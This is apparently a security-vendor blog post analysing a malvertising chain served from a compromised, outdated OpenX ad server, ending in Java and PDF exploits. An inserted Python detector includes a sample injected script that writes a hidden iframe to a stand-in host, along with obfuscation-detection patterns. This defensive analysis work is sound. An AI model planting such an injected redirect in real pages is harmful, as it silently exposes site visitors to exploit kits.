Regular SophosLabs blog readers may have read previous posts about attacks that have poisoned ads content in order to inject malicious code into legitimate web sites. This is a nasty form of attack which can reach a potentially huge audience.
Yesterday I noticed another attack using poisoned ads content from an OpenX ads server.
The malicious script injected into the HTML served up from the compromised ads server is highlighted below.
Deobfuscating the script, we can see it adds an iframe to the page to load another malicious script.
This second script is obfuscated in the exact same manner.
It provides another iframe-driven redirect, in order to load a third obfuscated script. This final script is responsible for loading malicious Java and PDF content in order to exploit client-side vulnerabilities and infect the victim with the payload (pro-actively detected as Mal/TDSSPack-Z). Consistent with the recent rise we have reported in Java exploits, this attack involves malicious class files, targeting the HsbParser.getSoundBank vulnerability (CVE-2009-3867) and an old privilege escalation vulnerability in the handling of ZoneInfo objects during deserialization (CVE-2008-5353).
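As an added illustration (not code from the original post), a small Python check a site owner could run over the HTML their ad server actually serves: it collects inline scripts, flags the unescape/document.write pattern described above, decodes the escaped literal and reports any hidden iframe it resolves to. The sample markup and the ads.example.invalid host are constructed assumptions, not the real injected script.

```python
import re
import urllib.parse
from html.parser import HTMLParser

# Constructed sample of ad-server HTML carrying an injected obfuscated script; the shape
# (escaped iframe fed to document.write(unescape(...))) is assumed, not the real script.
SAMPLE_HTML = """<html><body><div class="ad"><img src="banner.gif"></div>
<script type="text/javascript">
var s="%3Ciframe%20src%3D%22http%3A//ads.example.invalid/r.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E";
document.write(unescape(s));
</script>
<script src="/www/delivery/spcjs.php?id=1"></script>
</body></html>"""

# Calls common in this style of obfuscation; on their own they are only a weak signal.
SUSPECT_CALLS = ("unescape(", "eval(", "String.fromCharCode(", "document.write(")
# A 0/1 px or CSS-hidden iframe is the classic marker of a silent redirect.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(?:width\s*=\s*[\"']?[01]\b|height\s*=\s*[\"']?[01]\b"
                           r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
IFRAME_SRC = re.compile(r"src\s*=\s*[\"']?([^\"' >]+)", re.I)

class ScriptCollector(HTMLParser):
    # Collect the body of every inline <script> in the served page (chunks concatenated).
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def decode_literals(script):
    # Decode %xx-escaped string literals the way JavaScript's unescape() would.
    return [urllib.parse.unquote(lit)
            for lit in re.findall(r"[\"']([^\"']*%[0-9A-Fa-f]{2}[^\"']*)[\"']", script)]

def analyse(html):
    # One finding per inline script that uses suspect calls AND decodes to a hidden iframe.
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for index, body in enumerate(parser.scripts):
        calls = [c for c in SUSPECT_CALLS if c in body]
        hidden = [IFRAME_SRC.search(lit) for lit in decode_literals(body) if HIDDEN_IFRAME.search(lit)]
        srcs = [m.group(1) for m in hidden if m]
        if calls and srcs:
            findings.append({"script": index, "calls": calls, "hidden_iframe_srcs": srcs})
    return findings
```

Each hop in the chain described above can be checked the same way by feeding the HTML the reported iframe src returns back into analyse(), which is how the three-stage redirect would be walked from the defender's side.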
Sophos customers are already protected from this attack:
- The poisoned ads content and all the subsequent scripts loaded are pro-actively detected as Mal/ObfJS-CR
- The malicious Java content is pro-actively detected as Troj/BytVrfy-C and Troj/Clsldr-U
- Detection for the malicious PDF has been added as Troj/PDFJs-LE
- The payload is pro-actively detected as Mal/TDSSPack-Z
The most important message to learn from this attack concerns the use of third-party software/applications in building web content. We have written before about content management systems (CMS) providing easy targets for hackers looking to compromise sites. Third-party advertising scripts are no different, providing a large population of target sites for the attacker.
There are various models for using OpenX advertising. One of them is OpenX Community Download, where the users host their own ad-server. Very convenient and quick to set up, but an often overlooked cost to this option is that the site administrator has to take on the responsibility of keeping their scripts updated. They need to keep up to date with vulnerabilities, security patches, new product versions etc. This is no small task, but failure to do so can result in what we have here - delivering malicious code to all the web sites loading the ad content. That is why hosted advertising models are also popular - leaving the hosting, updating and patching to the application vendor.
The ad-server hit in the attack described above is running v2.8.0, which is several versions out of date (the latest version is v2.8.5).